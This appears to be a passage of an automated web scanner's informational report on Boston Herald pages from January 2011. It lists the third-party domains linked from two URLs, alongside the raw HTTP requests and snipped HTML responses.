</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Logan Mankins believes Patriots days are over');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/playeraaa.aspx?id=5019,team=077" >stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(27) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg" alt="Logan Mankins is seen in this file..." /></div>
...[SNIP]...
<a href="/sports/football/patriots/view/20110127mayo_chats_up_lewis/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/666107_Belichick_01272011.jpg" alt="Jerod Mayo chats up Ray Lewis" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110127mankins_at_head_of_line_his_status_with_patriots_a_going_concern/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/733e81_Mankins_01272011.jpg" alt="Logan Mankins at head of line" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110126mankins_wont_rule_out_pats/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/52e6d1_makn.jpg" alt="Mankins won’t rule out Pats" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.302. http://www.bostonherald.com/track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/track/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_300x100_animated.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110126/stp/88a799_NKOTB_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/5eb1a6_mitt_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5e8b2b_ben_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5fe4ec_ltpchsheen.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/67bc6f_beebs_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/a2c141_kate_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://twitter.com/bostonherald
http://www.4info.net/logon.jsp
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.twitter.com/
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:26:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 78085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1312550&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Moore’s the merrier at Hasty festivities"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1312550&position=0">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1312550&position=0">
...[SNIP]...
<a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1312537&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" alt="Charlie Sheen."></a>
...[SNIP]...
<a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1312557&srvc=track&position=2"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5e8b2b_ben_01282011.jpg" alt="Former Patriots defensive end Jarvis Green celebrates
his birthday with a cake replica of Gillette Stadium."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2">
...[SNIP]...
<a href="http://bostonherald.com/track/inside_track/view.bg?articleid=1312555&srvc=track&position=3"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg" alt="Mitt Romney."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/track/inside_track/view.bg?articleid=1312555&format=comments&srvc=track&position=3">
...[SNIP]...
<a href="http://bostonherald.com/track/star_tracks/view.bg?articleid=1312549&srvc=track&position=4"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/67bc6f_beebs_01282011.jpg" alt="Justin Bieber."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=4">
...[SNIP]...
</div>
   <a href="http://www.4info.net/logon.jsp" style="color:#000099">Modify or Cancel alerts</a>
...[SNIP]...
<a href="/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/88a799_NKOTB_01272011.jpg" alt="Brian Littrell, Jonathan Knight, Howie Dorough, Donnie Wahlberg, Jordan Knight, Joey McIntyre, and Danny Wood jump in front of the Green Monster yesterday after announcing they will play at Fenway Park for a summer show as NKOTBSB." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also">
...[SNIP]...
<a href="/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a2c141_kate_01282011.jpg" alt="Kate Hudson." /></a>
...[SNIP]...
<a href="/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5fe4ec_ltpchsheen.jpg" alt="Charlie Sheen" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also">
...[SNIP]...
<div id="rssBoxWhat">
                           <a target="_new" href="http://www.twitter.com">What is Twitter?</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<a href="/track/track_gals_tv/"><img style="border: 1px #666 solid;" src="http://cache.heraldinteractive.com/images/version5.0/site_images/tg_tv_tease_300x100_animated.gif" /></a>
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312555"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/5eb1a6_mitt_01282011.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.303. http://www.bostonherald.com/track/celebrity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/track/celebrity/?srvc=track&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fcelebrity%2F%3Forder%3DlastUpdate.desc&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/celebrity/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110125/stp/61a204_jack.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/6420d5_Colbert_09092010.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/9a3688_oprah012511.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/e5d449_bmichaels012511.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/1d99eb_mccourts012611.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/2f2766_ltpvneil.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/763aba_ltpbardemcruz.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/34c0e9_ltpSeger012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/55b7a0_ltpSAG012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5fe4ec_ltpchsheen.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/b46189_ltpferrell.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/c6d07e_ltpBorgnine012711.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/f49fc3_ltpConnorybust012711.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.4info.net/logon.jsp
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/celebrity/?srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Celebrity News - Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/celebrity/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Fcelebrity%2F%3Forder%3DlastUpdate.desc&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5fe4ec_ltpchsheen.jpg" alt="Charlie Sheen"></a>
...[SNIP]...
<a href="/track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/f49fc3_ltpConnorybust012711.jpg" alt="British Ambassador Peter Cater looks at a bronze bust of Oscar-winning actor Sean Connery, a prominent Scottish nationalist, after unveiling it at the Scottish Club in Tallin, Estonia, Thursday, Jan. 27, 2011."></a>
...[SNIP]...
<a href="/track/celebrity/view/20110127will_ferrell_to_visit_the_office_for_an_arc/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/b46189_ltpferrell.jpg" alt="Will Ferrell"></a>
...[SNIP]...
<a href="/track/celebrity/view/20110127ernest_borgnine_laughs_all_the_way_to_the_sag_awards/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/c6d07e_ltpBorgnine012711.jpg" alt="In this Oct. 26, 2010 file photo, actor Ernest Borgnine poses for a portrait at his home in Beverly Hills, Calif. Borgnine will receive the Lifetime Achievement Award at the Screen Actors Guild Awards on Jan. 30, 2011."></a>
...[SNIP]...
<a href="/track/celebrity/view/20110127sag_awards_get_greener_with_paperless_ballots/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/55b7a0_ltpSAG012711.jpg" alt="In this Jan. 21, 2011 file photo, craftsman Ricardo Godinez applies a green-black patina coating to a statuette being finished for the 17th Annual Screen Actors Guild Awards at the American Fine Arts Foundry in Burbank, Calif."></a>
...[SNIP]...
<a href="/track/celebrity/view/20110127veteran_rocker_bob_seger_planning_new_tour_album/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/34c0e9_ltpSeger012711.jpg" alt="In this Dec. 20, 2006 file photo, Bob Seger performs during his ‘Face The Promise’ tour stop at the Palace of Auburn Hills, Mich."></a>
